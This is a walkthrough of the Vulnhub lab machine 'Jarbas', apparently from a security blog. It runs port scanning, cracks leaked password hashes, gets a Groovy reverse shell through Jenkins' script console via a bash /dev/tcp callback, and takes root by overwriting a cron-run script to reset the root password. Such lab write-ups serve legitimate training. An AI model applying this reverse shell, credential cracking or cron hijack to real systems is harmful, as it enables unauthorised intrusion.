Vulnhub - Jarbas

Hi all, today i wanted to try something old from vulnhub so let’s start!

You can find the machine there > Jarbas

Enumeration/Reconnaissance

Let’s start always with nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
$ ip=192.168.1.8
$ nmap -p- --min-rate 10000 $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-21 14:44 EEST
Nmap scan report for jarbas.zte.com.cn (192.168.1.8)
Host is up (0.000091s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
8080/tcp open  http-proxy
MAC Address: 00:0C:29:43:6E:8D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.01 seconds
$ nmap -p 22,80,3306,8080 -sC -sV -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-21 14:44 EEST
Nmap scan report for jarbas.zte.com.cn (192.168.1.8)
Host is up (0.00047s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 28:bc:49:3c:6c:43:29:57:3c:b8:85:9a:6d:3c:16:3f (RSA)
|   256 a0:1b:90:2c:da:79:eb:8f:3b:14:de:bb:3f:d2:e7:3f (ECDSA)
|_  256 57:72:08:54:b7:56:ff:c3:e6:16:6f:97:cf:ae:7f:76 (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Jarbas - O Seu Mordomo Virtual!
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
MAC Address: 00:0C:29:43:6E:8D (VMware)

Let’s enumerate port 80 first by running gobuster scan!

1
2
3
$ gobuster dir -q -u http://$ip/ -w $dir_medium -x php,txt,html -o gobuster.txt
/index.html (Status: 200)
/access.html (Status: 200)

access.html provide us some username with hashed passwords:

1
2
3
tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98

Let’s use crackstation to crack them.

1
2
3
tiago:italia99
trindade:marianna
eder:vipsu

jenkins reverse shell - shell as jenkins

Now on port 8080 runs jenkins, jenkins is an open-source automation server that automates technical tasks. After some tries eder:vipsu worked!

Now we can easily get code execution via the script console:

1
2
3
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

We have shell:

1
2
3
4
5
6
7
8
9
10
$ nc -lvp 5555
listening on [any] 5555 ...
bash -i
bash-4.2$ python -c 'import pty; pty.spawn("/bin/bash")'
bash-4.2$ ^Z
[1]+  Stopped                 nc -lvp 5555
$ stty raw -echo
$ fg
bash-4.2$ whoami
jenkins

jenkins -> root

Now privesc is simple, let’s check the cronjobs:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
bash-4.2$ cat /etc/cron*
cat: /etc/cron.d: Is a directory
cat: /etc/cron.daily: Is a directory
cat: /etc/cron.deny: Permission denied
cat: /etc/cron.hourly: Is a directory
cat: /etc/cron.monthly: Is a directory
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1

The /etc/script/CleaningScript.sh runs as root every 5 minute, let’s edit it to change root password.

1
2
3
4
5
bash-4.2$ > /etc/script/CleaningScript.sh
bash-4.2$ cat - > /etc/script/CleaningScript.sh
#!/bin/bash
echo 'root:pwned' | sudo chpasswd
^C

After some minutes..

1
2
3
4
5
6
bash-4.2$ su - root
Password: 
Last login: Mon Apr  2 18:33:39 -03 2018 from 192.168.114.1 on pts/0
Last failed login: Tue Jul 21 09:04:18 -03 2020 on pts/0
There was 1 failed login attempt since the last successful login.
[root@jarbas ~]# 

Let’s read the flag:

1
2
3
4
5
6
7
8
9
[root@jarbas ~]# cat /root/flag.txt 
Hey!

Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)

Thanks for appreciating this machine.

@tiagotvrs 

was fun.